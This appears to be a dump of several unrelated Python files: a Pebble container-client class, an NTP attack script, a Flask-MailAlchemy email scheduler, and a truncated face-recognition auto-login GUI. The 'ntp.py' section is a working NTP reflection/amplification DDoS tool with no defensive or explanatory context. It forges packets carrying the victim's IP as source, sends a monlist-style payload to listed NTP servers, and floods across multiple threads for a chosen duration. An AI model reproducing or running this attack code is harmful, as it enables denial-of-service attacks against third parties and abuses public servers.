def _wait_change_using_polling(self, change_id, timeout, delay):
"""Wait for a change to be ready by polling the get-change API."""
deadline = time.time() + timeout if timeout is not None else None
while timeout is None or time.time() < deadline:
change = self.get_change(change_id)
if change.ready:
return change
time.sleep(delay)
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
def add_layer(
self, label: str, layer: typing.Union[str, dict, Layer], *, combine: bool = False):
"""Dynamically add a new layer onto the Pebble configuration layers.
If combine is False (the default), append the new layer as the top
layer with the given label. If combine is True and the label already
exists, the two layers are combined into a single one considering the
layer override rules; if the layer doesn't exist, it is added as usual.
"""
if not isinstance(label, str):
raise TypeError('label must be a str, not {}'.format(type(label).__name__))
if isinstance(layer, str):
layer_yaml = layer
elif isinstance(layer, dict):
layer_yaml = Layer(layer).to_yaml()
elif isinstance(layer, Layer):
layer_yaml = layer.to_yaml()
else:
raise TypeError('layer must be str, dict, or pebble.Layer, not {}'.format(
type(layer).__name__))
body = {
'action': 'add',
'combine': combine,
'label': label,
'format': 'yaml',
'layer': layer_yaml,
}
self._request('POST', '/v1/layers', body=body)
def get_plan(self) -> Plan:
"""Get the Pebble plan (currently contains only combined services)."""
resp = self._request('GET', '/v1/plan', {'format': 'yaml'})
return Plan(resp['result'])
def get_services(self, names: typing.List[str] = None) -> typing.List[ServiceInfo]:
"""Get the service status for the configured services.
If names is specified, only fetch the service status for the services
named.
"""
query = None
if names is not None:
query = {'names': ','.join(names)}
resp = self._request('GET', '/v1/services', query)
return [ServiceInfo.from_dict(info) for info in resp['result']]
def pull(self, path: str, *, encoding: str = 'utf-8') -> typing.Union[typing.BinaryIO,
typing.TextIO]:
"""Read a file's content from the remote system.
Args:
path: Path of the file to read from the remote system.
encoding: Encoding to use for decoding the file's bytes to str,
or None to specify no decoding.
Returns:
A readable file-like object, whose read() method will return str
objects decoded according to the specified encoding, or bytes if
encoding is None.
"""
query = {
'action': 'read',
'path': path,
}
headers = {'Accept': 'multipart/form-data'}
response = self._request_raw('GET', '/v1/files', query, headers)
options = self._ensure_content_type(response.headers, 'multipart/form-data')
boundary = options.get('boundary', '')
if not boundary:
raise ProtocolError('invalid boundary {!r}'.format(boundary))
# We have to manually write the Content-Type with boundary, because
# email.parser expects the entire multipart message with headers.
parser = email.parser.BytesFeedParser()
parser.feed(b'Content-Type: multipart/form-data; boundary='
+ boundary.encode('utf-8') + b'\r\n\r\n')
# Then read the rest of the response and feed it to the parser.
while True:
chunk = response.read(self._chunk_size)
if not chunk:
break
parser.feed(chunk)
message = parser.close()
# Walk over the multipart parts and read content and metadata.
resp = None
content = None
for part in message.walk():
name = part.get_param('name', header='Content-Disposition')
if name == 'response':
resp = _json_loads(part.get_payload())
elif name == 'files':
filename = part.get_filename()
if filename != path:
raise ProtocolError('path not expected: {}'.format(filename))
# decode=True, ironically, avoids decoding bytes to str
content = part.get_payload(decode=True)
if resp is None:
raise ProtocolError('no "response" field in multipart body')
self._raise_on_path_error(resp, path)
if content is None:
raise ProtocolError('no file content in multipart response')
if encoding is not None:
reader = io.StringIO(content.decode(encoding))
else:
reader = io.BytesIO(content)
return reader
@staticmethod
def _raise_on_path_error(resp, path):
result = resp['result'] or [] # in case it's null instead of []
paths = {item['path']: item for item in result}
if path not in paths:
raise ProtocolError('path not found in response metadata: {}'.format(resp))
error = paths[path].get('error')
if error:
raise PathError(error['kind'], error['message'])
def push(
self, path: str, source: typing.Union[bytes, str, typing.BinaryIO, typing.TextIO], *,
encoding: str = 'utf-8', make_dirs: bool = False, permissions: int = None,
user_id: int = None, user: str = None, group_id: int = None, group: str = None):
"""Write content to a given file path on the remote system.
Args:
path: Path of the file to write to on the remote system.
source: Source of data to write. This is either a concrete str or
bytes instance, or a readable file-like object.
encoding: Encoding to use for encoding source str to bytes, or
strings read from source if it is a TextIO type. Ignored if
source is bytes or BinaryIO.
make_dirs: If True, create parent directories if they don't exist.
permissions: Permissions (mode) to create file with (Pebble default
is 0o644).
user_id: User ID (UID) for file.
user: Username for file. User's UID must match user_id if both are
specified.
group_id: Group ID (GID) for file.
group: Group name for file. Group's GID must match group_id if
both are specified.
"""
info = self._make_auth_dict(permissions, user_id, user, group_id, group)
info['path'] = path
if make_dirs:
info['make-dirs'] = True
metadata = {
'action': 'write',
'files': [info],
}
data, content_type = self._encode_multipart(metadata, path, source, encoding)
headers = {
'Accept': 'application/json',
'Content-Type': content_type,
}
response = self._request_raw('POST', '/v1/files', None, headers, data)
self._ensure_content_type(response.headers, 'application/json')
resp = _json_loads(response.read())
self._raise_on_path_error(resp, path)
@staticmethod
def _make_auth_dict(permissions, user_id, user, group_id, group) -> typing.Dict:
d = {}
if permissions is not None:
d['permissions'] = format(permissions, '03o')
if user_id is not None:
d['user-id'] = user_id
if user is not None:
d['user'] = user
if group_id is not None:
d['group-id'] = group_id
if group is not None:
d['group'] = group
return d
def _encode_multipart(self, metadata, path, source, encoding):
# Python's stdlib mime/multipart handling is screwy and doesn't handle
# binary properly, so roll our own.
if isinstance(source, str):
source = io.StringIO(source)
elif isinstance(source, bytes):
source = io.BytesIO(source)
boundary = binascii.hexlify(os.urandom(16))
path_escaped = path.replace('"', '\\"').encode('utf-8') # NOQA: test_quote_backslashes
content_type = 'multipart/form-data; boundary="' + boundary.decode('utf-8') + '"'
def generator():
yield b''.join([
b'--', boundary, b'\r\n',
b'Content-Type: application/json\r\n',
b'Content-Disposition: form-data; name="request"\r\n',
b'\r\n',
json.dumps(metadata).encode('utf-8'), b'\r\n',
b'--', boundary, b'\r\n',
b'Content-Type: application/octet-stream\r\n',
b'Content-Disposition: form-data; name="files"; filename="',
path_escaped, b'"\r\n',
b'\r\n',
])
content = source.read(self._chunk_size)
while content:
if isinstance(content, str):
content = content.encode(encoding)
yield content
content = source.read(self._chunk_size)
yield b''.join([
b'\r\n',
b'--', boundary, b'--\r\n',
])
return generator(), content_type
def list_files(self, path: str, *, pattern: str = None,
itself: bool = False) -> typing.List[FileInfo]:
"""Return list of directory entries from given path on remote system.
Despite the name, this method returns a list of files *and*
directories, similar to :func:`os.listdir` or :func:`os.scandir`.
Args:
path: Path of the directory to list, or path of the file to return
information about.
pattern: If specified, filter the list to just the files that match,
for example ``*.txt``.
itself: If path refers to a directory, return information about the
directory itself, rather than its contents.
"""
query = {
'action': 'list',
'path': path,
}
if pattern:
query['pattern'] = pattern
if itself:
query['itself'] = 'true'
resp = self._request('GET', '/v1/files', query)
result = resp['result'] or [] # in case it's null instead of []
return [FileInfo.from_dict(d) for d in result]
def make_dir(
self, path: str, *, make_parents: bool = False, permissions: int = None,
user_id: int = None, user: str = None, group_id: int = None, group: str = None):
"""Create a directory on the remote system with the given attributes.
Args:
path: Path of the directory to create on the remote system.
make_parents: If True, create parent directories if they don't exist.
permissions: Permissions (mode) to create directory with (Pebble
default is 0o755).
user_id: User ID (UID) for directory.
user: Username for directory. User's UID must match user_id if
both are specified.
group_id: Group ID (GID) for directory.
group: Group name for directory. Group's GID must match group_id
if both are specified.
"""
info = self._make_auth_dict(permissions, user_id, user, group_id, group)
info['path'] = path
if make_parents:
info['make-parents'] = True
body = {
'action': 'make-dirs',
'dirs': [info],
}
resp = self._request('POST', '/v1/files', None, body)
self._raise_on_path_error(resp, path)
def remove_path(self, path: str, *, recursive: bool = False):
"""Remove a file or directory on the remote system.
Args:
path: Path of the file or directory to delete from the remote system.
            recursive: If True and path is a directory, recursively delete it
                and everything under it. If path is a file, delete the file.
                Do nothing if the path does not exist. Behaviourally similar
                to `rm -rf <file|dir>`.
"""
info = {'path': path}
if recursive:
info['recursive'] = True
body = {
'action': 'remove',
'paths': [info],
}
resp = self._request('POST', '/v1/files', None, body)
self._raise_on_path_error(resp, path)
def exec(
self,
command: typing.List[str],
*,
environment: typing.Dict[str, str] = None,
working_dir: str = None,
timeout: float = None,
user_id: int = None,
user: str = None,
group_id: int = None,
group: str = None,
stdin: typing.Union[str, bytes, typing.TextIO, typing.BinaryIO] = None,
stdout: typing.Union[typing.TextIO, typing.BinaryIO] = None,
stderr: typing.Union[typing.TextIO, typing.BinaryIO] = None,
encoding: str = 'utf-8',
combine_stderr: bool = False
) -> ExecProcess:
r"""Execute the given command on the remote system.
Most of the parameters are explained in the "Parameters" section
below, however, input/output handling is a bit more complex. Some
examples are shown below::
# Simple command with no output; just check exit code
>>> process = client.exec(['send-emails'])
>>> process.wait()
# Fetch output as string
>>> process = client.exec(['python3', '--version'])
>>> version, _ = process.wait_output()
>>> print(version)
Python 3.8.10
# Fetch both stdout and stderr as strings
>>> process = client.exec(['pg_dump', '-s', ...])
>>> schema, logs = process.wait_output()
# Stream input from a string and write output to files
>>> stdin = 'foo\nbar\n'
>>> with open('out.txt', 'w') as out, open('err.txt', 'w') as err:
... process = client.exec(['awk', '{ print toupper($0) }'],
... stdin=stdin, stdout=out, stderr=err)
... process.wait()
>>> open('out.txt').read()
'FOO\nBAR\n'
>>> open('err.txt').read()
''
# Real-time streaming using ExecProcess.stdin and ExecProcess.stdout
>>> process = client.exec(['cat'])
>>> def stdin_thread():
... for line in ['one\n', '2\n', 'THREE\n']:
... process.stdin.write(line)
... process.stdin.flush()
... time.sleep(1)
... process.stdin.close()
...
>>> threading.Thread(target=stdin_thread).start()
>>> for line in process.stdout:
... print(datetime.datetime.now().strftime('%H:%M:%S'), repr(line))
...
16:20:26 'one\n'
16:20:27 '2\n'
16:20:28 'THREE\n'
>>> process.wait() # will return immediately as stdin was closed
# Show exception raised for non-zero return code
>>> process = client.exec(['ls', 'notexist'])
>>> out, err = process.wait_output()
Traceback (most recent call last):
...
ExecError: "ls" returned exit code 2
>>> exc = sys.last_value
>>> exc.exit_code
2
>>> exc.stdout
''
>>> exc.stderr
"ls: cannot access 'notfound': No such file or directory\n"
Args:
command: Command to execute: the first item is the name (or path)
of the executable, the rest of the items are the arguments.
environment: Environment variables to pass to the process.
working_dir: Working directory to run the command in. If not set,
Pebble uses the target user's $HOME directory (and if the user
argument is not set, $HOME of the user Pebble is running as).
timeout: Timeout in seconds for the command execution, after which
the process will be terminated. If not specified, the
execution never times out.
user_id: User ID (UID) to run the process as.
user: Username to run the process as. User's UID must match
user_id if both are specified.
group_id: Group ID (GID) to run the process as.
group: Group name to run the process as. Group's GID must match
group_id if both are specified.
stdin: A string or readable file-like object that is sent to the
process's standard input. If not set, the caller can write
input to :attr:`ExecProcess.stdin` to stream input to the
process.
stdout: A writable file-like object that the process's standard
output is written to. If not set, the caller can use
:meth:`ExecProcess.wait_output` to capture output as a string,
or read from :meth:`ExecProcess.stdout` to stream output from
the process.
stderr: A writable file-like object that the process's standard
error is written to. If not set, the caller can use
:meth:`ExecProcess.wait_output` to capture error output as a
string, or read from :meth:`ExecProcess.stderr` to stream
error output from the process. Must be None if combine_stderr
is True.
encoding: If encoding is set (the default is UTF-8), the types
read or written to stdin/stdout/stderr are str, and encoding
is used to encode them to bytes. If encoding is None, the
types read or written are raw bytes.
combine_stderr: If True, process's stderr output is combined into
its stdout (the stderr argument must be None). If False,
separate streams are used for stdout and stderr.
Returns:
A Process object representing the state of the running process.
To wait for the command to finish, the caller will typically call
:meth:`ExecProcess.wait` if stdout/stderr were provided as
arguments to :meth:`exec`, or :meth:`ExecProcess.wait_output` if
not.
"""
if not isinstance(command, list) or not all(isinstance(s, str) for s in command):
raise TypeError('command must be a list of str, not {}'.format(
type(command).__name__))
if len(command) < 1:
raise ValueError('command must contain at least one item')
if stdin is not None:
if isinstance(stdin, str):
if encoding is None:
raise ValueError('encoding must be set if stdin is str')
stdin = io.BytesIO(stdin.encode(encoding))
elif isinstance(stdin, bytes):
if encoding is not None:
raise ValueError('encoding must be None if stdin is bytes')
stdin = io.BytesIO(stdin)
elif not hasattr(stdin, 'read'):
raise TypeError('stdin must be str, bytes, or a readable file-like object')
if combine_stderr and stderr is not None:
raise ValueError('stderr must be None if combine_stderr is True')
body = {
'command': command,
'environment': environment or {},
'working-dir': working_dir,
'timeout': _format_timeout(timeout) if timeout is not None else None,
'user-id': user_id,
'user': user,
'group-id': group_id,
'group': group,
'split-stderr': not combine_stderr,
}
resp = self._request('POST', '/v1/exec', body=body)
change_id = resp['change']
task_id = resp['result']['task-id']
stderr_ws = None
try:
control_ws = self._connect_websocket(task_id, 'control')
stdio_ws = self._connect_websocket(task_id, 'stdio')
if not combine_stderr:
stderr_ws = self._connect_websocket(task_id, 'stderr')
except websocket.WebSocketException as e:
# Error connecting to websockets, probably due to the exec/change
# finishing early with an error. Call wait_change to pick that up.
change = self.wait_change(ChangeID(change_id))
if change.err:
raise ChangeError(change.err, change)
raise ConnectionError('unexpected error connecting to websockets: {}'.format(e))
cancel_stdin = None
cancel_reader = None
threads = []
if stdin is not None:
if _has_fileno(stdin):
if sys.platform == 'win32':
raise NotImplementedError('file-based stdin not supported on Windows')
# Create a pipe so _reader_to_websocket can select() on the
# reader as well as this cancel_reader; when we write anything
# to cancel_writer it'll trigger the select and end the thread.
cancel_reader, cancel_writer = os.pipe()
def cancel_stdin():
os.write(cancel_writer, b'x') # doesn't matter what we write
os.close(cancel_writer)
t = _start_thread(_reader_to_websocket, stdin, stdio_ws, encoding, cancel_reader)
threads.append(t)
process_stdin = None
else:
process_stdin = _WebsocketWriter(stdio_ws)
if encoding is not None:
process_stdin = io.TextIOWrapper(process_stdin, encoding=encoding, newline='')
if stdout is not None:
t = _start_thread(_websocket_to_writer, stdio_ws, stdout, encoding)
threads.append(t)
process_stdout = None
else:
process_stdout = _WebsocketReader(stdio_ws)
if encoding is not None:
process_stdout = io.TextIOWrapper(process_stdout, encoding=encoding, newline='')
process_stderr = None
if not combine_stderr:
if stderr is not None:
t = _start_thread(_websocket_to_writer, stderr_ws, stderr, encoding)
threads.append(t)
else:
process_stderr = _WebsocketReader(stderr_ws)
if encoding is not None:
process_stderr = io.TextIOWrapper(
process_stderr, encoding=encoding, newline='')
process = ExecProcess(
stdin=process_stdin,
stdout=process_stdout,
stderr=process_stderr,
client=self,
timeout=timeout,
stdio_ws=stdio_ws,
stderr_ws=stderr_ws,
control_ws=control_ws,
command=command,
encoding=encoding,
change_id=ChangeID(change_id),
cancel_stdin=cancel_stdin,
cancel_reader=cancel_reader,
threads=threads,
)
return process
def _connect_websocket(self, task_id: str, websocket_id: str) -> websocket.WebSocket:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.socket_path)
url = self._websocket_url(task_id, websocket_id)
ws = websocket.WebSocket(skip_utf8_validation=True)
ws.connect(url, socket=sock)
return ws
def _websocket_url(self, task_id: str, websocket_id: str) -> str:
base_url = self.base_url.replace('http://', 'ws://')
url = '{}/v1/tasks/{}/websocket/{}'.format(base_url, task_id, websocket_id)
return url
def send_signal(self, sig: typing.Union[int, str], services: typing.List[str]):
"""Send the given signal to the list of services named.
Args:
sig: Name or number of signal to send, e.g., "SIGHUP", 1, or
signal.SIGHUP.
services: Non-empty list of service names to send the signal to.
Raises:
APIError: If any of the services are not in the plan or are not
currently running.
"""
if not isinstance(services, (list, tuple)):
raise TypeError('services must be a list of str, not {}'.format(
type(services).__name__))
for s in services:
if not isinstance(s, str):
raise TypeError('service names must be str, not {}'.format(type(s).__name__))
if isinstance(sig, int):
sig = signal.Signals(sig).name
body = {
'signal': sig,
'services': services,
}
self._request('POST', '/v1/signals', body=body)
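# Editor's example (not part of the original module): typical Client usage
# against a local Pebble socket. The socket path and file path below are
# illustrative assumptions, and a Pebble server must be listening there.
def _example_client_usage():
    client = Client(socket_path='/var/lib/pebble/default/.pebble.socket')
    info = client.get_system_info()
    print('Pebble version:', info.version)
    client.push('/tmp/hello.txt', 'hello world\n', make_dirs=True)
    content = client.pull('/tmp/hello.txt').read()
    assert content == 'hello world\n'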
|
ntp.py
|
import random
import time
from scapy.all import IP, send, Raw, UDP
from threading import Thread
def NTP_ATTACK(threads, attack_time, target):
    # Global stop flag shared with the flood threads
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("[#] Attack started for " + str(attack_time) + " secounds..")
# Payload
payload = ("\x17\x00\x03\x2a" + "\x00" * 4)
threads_list = []
# Load NTP servers list
with open("tools/L4/ntp_servers.txt", 'r') as f:
ntp_servers = f.readlines()
# NTP flood
def ntp_flood():
global FINISH
while not FINISH:
for server in ntp_servers:
if not FINISH:
# Packet
packets = random.randint(10, 150)
server = server.replace("\n", "")
try:
packet = IP(dst = server, src = target_ip) / UDP(sport = random.randint(2000,65535), dport = int(target_port)) / Raw(load = payload)
send( packet, count = packets, verbose = False)
except Exception as e:
print(e)
else:
print("[+] Sending " + str(packets) + " packets from NTP server: " + server + " to " + target)
# Start threads
for thread in range(threads):
print("[#] Staring thread " + str(thread))
t = Thread(target = ntp_flood)
t.start()
threads_list.append(t)
    # Sleep for the selected number of seconds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("[!] NTP attack stopped!")
|
core.py
|
import datetime as dt
import mimetypes
import os
import threading as th
import time as tm
import typing
from flask import Flask, Blueprint, render_template
from jinja2 import TemplateNotFound
from flask_mail import Mail, Message
from flask_sqlalchemy import SQLAlchemy
from flask_mailalchemy.model import AttachmentMixin, EmailMixin
class MailAlchemy:
"""Flask-MailAlchemy extension
Manages mail sending with scheduling and email sending limits.
Args:
app: Flask instance
db: SQLAlchemy instance
email_class: Email model class
"""
def __init__(
self,
app: Flask = None,
db: SQLAlchemy = None,
        email_class: typing.Type[EmailMixin] = None
):
self.app = app
self.db = db
self.mail = None
self.attachment_class = None
self.email_class = email_class
self.__stop_worker__ = False
if app is not None:
self.init_app(app, db)
def init_app(
self,
app: Flask,
db: SQLAlchemy,
        email_class: typing.Type[EmailMixin] = None
):
"""Initialize Flask-MailAlchemy
Initializes Flask-Mail instance, creates email model class and registers
blueprint `mail`.
Args:
app: Flask instance
db: SQLAlchemy instance
email_class: Email model class
"""
self.app = app
if db is None:
db = app.extensions.get("sqlalchemy").db
self.db = db
self.mail = Mail(self.app)
class Attachment(db.Model, AttachmentMixin):
pass
self.attachment_class = Attachment
self.email_class = self.email_class or email_class
if self.email_class is None:
class Email(db.Model, EmailMixin):
attachments = db.relationship(
Attachment,
secondary=db.Table(
"email_attachment",
db.Column(
"email_id",
db.Integer,
db.ForeignKey("email.id"),
primary_key=True
),
db.Column(
"attachment_id",
db.Integer,
db.ForeignKey("attachment.id"),
primary_key=True
)
),
backref="emails"
)
self.email_class = Email
self.app.register_blueprint(
Blueprint(
"mail",
__name__,
url_prefix='/mail',
template_folder="templates"
)
)
self.app.extensions["mail_alchemy"] = self
def send(self, msg: Message):
"""Sends a single message instance.
        Stores the messages in the database and sends them; a separate row is
        stored for every recipient. If TESTING is True the message will not
        actually be sent.
Args:
msg: a Message instance.
"""
emails = self.email_class.from_message(msg)
for email in emails:
self.db.session.add(email)
self.db.session.commit()
for email in emails:
email.send()
self.db.session.commit()
def send_message(self, *args, **kwargs):
"""Shortcut for send(msg).
Takes same arguments as Message constructor.
"""
msg = Message(*args, **kwargs)
self.send(msg)
@staticmethod
def render_template(msg: Message, template: str, **context):
"""Renders plaintext and HTML content for Message.
Message body is set from template found with .txt ending, html is set
from template found with .html ending.
Args:
msg: Message instance
template: Template name without extension
**context: Template context
"""
try:
msg.body = render_template(
"mail/{}.txt".format(template),
**context
)
        except TemplateNotFound:  # render_template raises TemplateNotFound, not FileNotFoundError
pass
try:
msg.html = render_template(
"mail/{}.html".format(template),
**context
)
        except TemplateNotFound:
pass
def attach_file(self, msg: Message, path: str):
"""Attach file to Message.
Args:
msg: Message instance
path: Path to file
"""
with self.app.open_resource(path) as f:
data = f.read()
content_type = mimetypes.MimeTypes().guess_type(path)[0]
msg.attach(
os.path.basename(path),
content_type=content_type or "application/octet-stream",
data=data
)
def schedule(self, msg: Message, scheduled_at: dt.datetime = None):
"""Schedules a single message instance to send in future.
        Stores the messages in the database to be sent later by the worker;
        a separate row is stored for every recipient.
Args:
msg: Message instance
scheduled_at: Time of sending in future
"""
if scheduled_at is None:
scheduled_at = dt.datetime.utcnow()
for email in self.email_class.from_message(msg):
email.scheduled_at = scheduled_at
self.db.session.add(email)
self.db.session.commit()
def schedule_message(
self,
*args,
scheduled_at: dt.datetime = None,
**kwargs
):
"""Shortcut for schedule(msg).
Takes same arguments as Message constructor plus the `scheduled_at`
datetime parameter.
"""
msg = Message(*args, **kwargs)
self.schedule(msg, scheduled_at=scheduled_at)
def worker(self):
"""Sends unsent emails that are scheduled before current time."""
with self.app.app_context():
while not self.__stop_worker__:
self.email_class.send_scheduled()
tm.sleep(self.app.config.get("MAIL_ALCHEMY_CYCLE", 10))
def run_worker(self):
"""Starts worker thread."""
thread = th.Thread(target=self.worker)
thread.start()
def stop_worker(self):
"""Stops worker thread's loop."""
self.__stop_worker__ = True
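# Editor's example (not part of the original module): minimal wiring of the
# extension. The config values, sender, and recipient below are illustrative
# assumptions; a real app would also configure an SMTP server via Flask-Mail.
if __name__ == '__main__':
    app = Flask(__name__)
    app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite://'
    app.config['MAIL_DEFAULT_SENDER'] = 'noreply@example.com'
    db = SQLAlchemy(app)
    mail = MailAlchemy(app, db)
    with app.app_context():
        db.create_all()
        # Queue an email to be sent five minutes from now by the worker
        mail.schedule_message(
            subject='Hello',
            recipients=['user@example.com'],
            body='Scheduled greeting',
            scheduled_at=dt.datetime.utcnow() + dt.timedelta(minutes=5),
        )
    mail.run_worker()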
|
main.py
|
# ///////////////////////////////////////////////////////////////
#
# BY: WANDERSON M.PIMENTA
# PROJECT MADE WITH: Qt Designer and PySide6
# V: 1.0.0
#
# This project can be used freely for all uses, as long as they maintain the
# respective credits only in the Python scripts, any information in the visual
# interface (GUI) can be modified without any implication.
#
# There are limitations on Qt licenses if you want to use your products
# commercially, I recommend reading them on the official website:
# https://doc.qt.io/qtforpython/licenses.html
#
# ///////////////////////////////////////////////////////////////
import sqlite3
import sys
import os
import platform
import threading
import cv2
import pyperclip
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
import time
# IMPORT / GUI AND MODULES AND WIDGETS
# ///////////////////////////////////////////////////////////////
import face_recognition
import numpy as np
from modules import *
from widgets import *
os.environ["QT_FONT_DPI"] = "96" # FIX Problem for High DPI and Scale above 100%
# SET AS GLOBAL WIDGETS
# ///////////////////////////////////////////////////////////////
widgets = None
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
# SET AS GLOBAL WIDGETS
# ///////////////////////////////////////////////////////////////
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
global face_locations
global face_names
global face_encodings
global widgets
global selected_name
global logined
logined = 0
widgets = self.ui
face_locations = []
face_encodings = []
face_names = []
selected_name = ''
# USE CUSTOM TITLE BAR | USE AS "False" FOR MAC OR LINUX
# ///////////////////////////////////////////////////////////////
Settings.ENABLE_CUSTOM_TITLE_BAR = True
# APP NAME
# ///////////////////////////////////////////////////////////////
title = "PyDracula - Modern GUI"
description = "FaceLink - 얼굴인식 자동로그인"
# APPLY TEXTS
self.setWindowTitle(title)
# TOGGLE MENU
# ///////////////////////////////////////////////////////////////
widgets.toggleButton.clicked.connect(lambda: UIFunctions.toggleMenu(self, True))
# SET UI DEFINITIONS
# ///////////////////////////////////////////////////////////////
UIFunctions.uiDefinitions(self)
# QTableWidget PARAMETERS
# ///////////////////////////////////////////////////////////////
# widgets.tableWidget.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
# BUTTONS CLICK
# ///////////////////////////////////////////////////////////////
# LEFT MENUS
widgets.btn_home.clicked.connect(self.buttonClick)
widgets.btn_bookmark.clicked.connect(self.buttonClick)
widgets.function_button.clicked.connect(self.buttonClick)
widgets.complete.clicked.connect(self.buttonClick)
widgets.editbutton1.clicked.connect(self.buttonClick)
widgets.editbutton2.clicked.connect(self.buttonClick)
widgets.editbutton3.clicked.connect(self.buttonClick)
widgets.editbutton4.clicked.connect(self.buttonClick)
widgets.editbutton5.clicked.connect(self.buttonClick)
widgets.editbutton6.clicked.connect(self.buttonClick)
widgets.delbutton1.clicked.connect(self.buttonClick)
widgets.delbutton2.clicked.connect(self.buttonClick)
widgets.delbutton3.clicked.connect(self.buttonClick)
widgets.delbutton4.clicked.connect(self.buttonClick)
widgets.delbutton5.clicked.connect(self.buttonClick)
widgets.delbutton6.clicked.connect(self.buttonClick)
widgets.bookpage1.clicked.connect(self.link_bookmark)
widgets.bookpage2.clicked.connect(self.link_bookmark)
widgets.bookpage3.clicked.connect(self.link_bookmark)
widgets.bookpage4.clicked.connect(self.link_bookmark)
widgets.bookpage5.clicked.connect(self.link_bookmark)
widgets.bookpage6.clicked.connect(self.link_bookmark)
widgets.complete_2.clicked.connect(self.edit_bookmark)
        widgets.logout.clicked.connect(self.buttonClick)
# EXTRA LEFT BOX
# EXTRA RIGHT BOX
def openCloseRightBox():
UIFunctions.toggleRightBox(self, True)
# SHOW APP
# ///////////////////////////////////////////////////////////////
self.show()
# SET CUSTOM THEME
# ///////////////////////////////////////////////////////////////
useCustomTheme = False
themeFile = "themes\py_dracula_light.qss"
# SET THEME AND HACKS
if useCustomTheme:
# LOAD AND APPLY STYLE
UIFunctions.theme(self, themeFile, True)
# SET HACKS
AppFunctions.setThemeHack(self)
# SET HOME PAGE AND SELECT MENU
# ///////////////////////////////////////////////////////////////
widgets.stackedWidget.setCurrentWidget(widgets.home)
widgets.btn_home.setStyleSheet(UIFunctions.selectMenu(widgets.btn_home.styleSheet()))
global running
running = True
th = threading.Thread(target=self.run)
th.daemon = True
th.start()
print("started..")
# BUTTONS CLICK
# Post here your functions for clicked buttons
# ///////////////////////////////////////////////////////////////
def run(self):
known_face_encodings = [np.load(f"./encodings/{path}") for path in os.listdir("./encodings")]
known_face_names = [os.path.splitext(path)[0] for path in os.listdir("./encodings")]
# Initialize some variables
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
widgets.camLabel.resize(640, 360)
global captured_img
global face_locations
global face_names
global face_encodings
process_this_frame = True
while running:
ret, img = cap.read()
small_frame = cv2.resize(img, (0, 0), fx=0.50, fy=0.50)
rgb_small_frame = small_frame[:, :, ::-1]
if process_this_frame:
last_locations = face_locations.copy()
last_names = face_names.copy()
last_encodings = face_encodings.copy()
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
if not len(face_locations):
face_locations = last_locations
face_names = last_names
face_encodings = last_encodings
else:
face_names = []
                for i, face_encoding in enumerate(face_encodings):
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
print(i, matches)
if True in matches:
print(-1)
face_names.append(known_face_names[matches.index(True)])
else:
face_names.append("Unknown");
print(face_names)
process_this_frame = not process_this_frame
for (top, right, bottom, left), name in zip(face_locations, face_names):
captured_img = cv2.resize(img, (0, 0), fx=0.5, fy=0.5)
                # Scale back up face locations since the frame we detected in was scaled to 1/2 size
top *= 2
right *= 2
bottom *= 2
left *= 2
# Draw a box around the face
cv2.rectangle(img, (left, top), (right, bottom), (146, 101, 57), 2)
# Draw a label with a name below the face
cv2.rectangle(img, (left, bottom - 25), (right, bottom), (146, 101, 57), cv2.FILLED)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, name, (left + 6, bottom-5), font, 0.8, (255, 255, 255), 1)
img = cv2.resize(img, (0, 0), fx=0.5, fy=0.5)
img_converted = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
h, w, c = img.shape
qImg = QImage(img_converted.data, w, h, w * c, QImage.Format_RGB888)
pixmap = QPixmap.fromImage(qImg)
            widgets.camLabel.setPixmap(pixmap)
cap.release()
def buttonClick(self):
# GET BUTTON CLICKED
global running
global face_locations
global face_names
global selected_name
global logined
btn = self.sender()
btnName = btn.objectName()
global btnNumber
try:
number = int(btnName[-1])
        except (ValueError, IndexError):
number = 0
if btnName not in ["logout", "btn_home"]:
running = False
else:
running = True
th = threading.Thread(target=self.run)
th.daemon = True
th.start()
# SHOW HOME PAGE
if btnName == "logout":
if logined == 0:
QMessageBox.about(self, "알림", "로그인 되어있지 않습니다.")
else:
face_locations = []
face_names = []
selected_name = ''
widgets.stackedWidget.setCurrentWidget(widgets.home)
QMessageBox.about(self, "알림", "로그아웃 되었습니다.")
if btnName == "btn_home":
widgets.stackedWidget.setCurrentWidget(widgets.home)
UIFunctions.resetStyle(self, btnName)
btn.setStyleSheet(UIFunctions.selectMenu(btn.styleSheet()))
elif btnName == "complete":
# user add start
uname = np.array(selected_encoding)
np.save(f"./encodings/{widgets.adduserName.text()}", uname)
ins = 'INSERT INTO student (name, ID, PW, url) VALUES(?, ?, ?, ?)'
for i, url in zip(range(1,7),
[
'https://eis.cbnu.ac.kr/cbnuLogin',
'https://www.naver.com/',
'https://www.instagram.com/',
'https://www.daum.net/',
'https://cbnu.blackboard.com/',
'https://everytime.kr/'
]):
curs.execute(ins, (widgets.adduserName.text()+str(i), '', '', url))
conn.commit()
print('데이터가 저장되었습니다.')
widgets.stackedWidget.setCurrentWidget(widgets.bookmark)
UIFunctions.resetStyle(self, "btn_bookmark")
widgets.btn_bookmark.setStyleSheet(UIFunctions.selectMenu(widgets.btn_bookmark.styleSheet()))
logined = 1
elif btnName == "function_button":
if selected_name == "Unknown":
widgets.stackedWidget.setCurrentWidget(widgets.add)
elif selected_name == "":
QMessageBox.about(self, "실패!", "얼굴 선택이 필요합니다.")
running = True
th = threading.Thread(target=self.run)
th.daemon = True
th.start()
else:
widgets.stackedWidget.setCurrentWidget(widgets.bookmark)
logined = 1
UIFunctions.resetStyle(self, "btn_bookmark")
